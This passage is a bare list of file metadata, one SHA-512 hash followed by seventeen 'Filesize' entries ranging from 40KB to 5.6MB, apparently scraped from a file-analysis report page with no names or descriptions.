SHA5126cccd11166671352289d4c7f8f9673362a728b9079fabe44a95955525557718c450bb7f1699bf4ffc9073fbfe6e541ff4d113ba3a30039ea2e0c61fa680339dd
-
Filesize
48KB
-
Filesize
88KB
-
Filesize
136KB
-
Filesize
88KB
-
Filesize
208KB
-
Filesize
712KB
-
Filesize
120KB
-
Filesize
472KB
-
Filesize
112KB
-
Filesize
5.6MB
-
Filesize
40KB
-
Filesize
2.1MB
-
Filesize
680KB
-
Filesize
1.8MB
-
Filesize
584KB
-
Filesize
944KB
-
Filesize
408KB